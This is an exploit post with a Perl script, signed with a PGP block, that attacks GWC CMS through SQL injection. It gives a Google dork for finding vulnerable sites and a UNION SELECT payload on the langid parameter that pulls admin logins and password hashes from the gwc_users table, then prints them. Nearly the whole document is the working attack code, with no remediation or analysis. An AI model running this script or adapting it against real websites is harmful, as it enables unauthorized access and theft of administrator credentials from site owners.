# Exploit Title: GWC CMS SQL Injection Vulnerability # Exploit Author: nopesled # Google Dork: "inurl:?langid=1 inurl:topmenuid=" # Date: 08/07/2015 # Version: 1.0 # Tested on: Linux #!/usr/bin/perl use LWP::UserAgent; use HTTP::Request::Common qw(GET); print " == Exploit by nopesled == \n"; if (@ARGV < 1){ die "Invalid amount of arguments\nExample: perl $0 http://site.com\n"; } $site = shift; $ua = LWP::UserAgent->new; $payload = "$site/?langid=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,group_concat(0x3c62723e,userlogin,0x3a,userpasswd) from gwc_users--"; print "[+] Grabbing Admin login [+]\n"; $request = GET $payload; $response = $ua->request($request); if ($response->is_success){ if ($response->content =~ /(.+[0-9a-f]{32})/){ print "[+] Admin info obtained [+]\n\n$1\n"; exit; } else { die "[+] Admin info not found [+]"; } } else { die "[+] Request failed [+]"; } exit; =pod -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Signed. -----BEGIN PGP SIGNATURE----- Version: Keybase OpenPGP v2.0.20 Comment: https://keybase.io/crypto wsBcBAABCgAGBQJVnUB5AAoJEOB0UMODnV4UWD0IAIPzPvMFsJOGhlv1HF1Nb1Xg g9fWZ8FWBV0/+hUuEBQX0TmcEgugssdG+ce4qhYthnqgKa9PgM/oViDUn4eEK32c /yyOgQ+uY4wMIZaV4LykLx3i9Dwh1kF+MuphLwHhPmuZMBu2sQNELJjdTtWJ6+cW Ue9g1eF1Af+Hn2LY+LBSwb9XbLYSqFkUAYSon/NCQgC7YWA+t7+B434zkgXBwZDe /ppTysv6nSI0EVap0u4dh7qafztQsFK2DF2f/cnU6JtYpOPvgbuoa/kHQ9yAVAr6 6LbNVN3uKXUd63ZlJvRAHao7mvrVzIojzstRiX8oOHl0u99NMHJukUEX7UhWXAM= =TMgD -----END PGP SIGNATURE----- =cut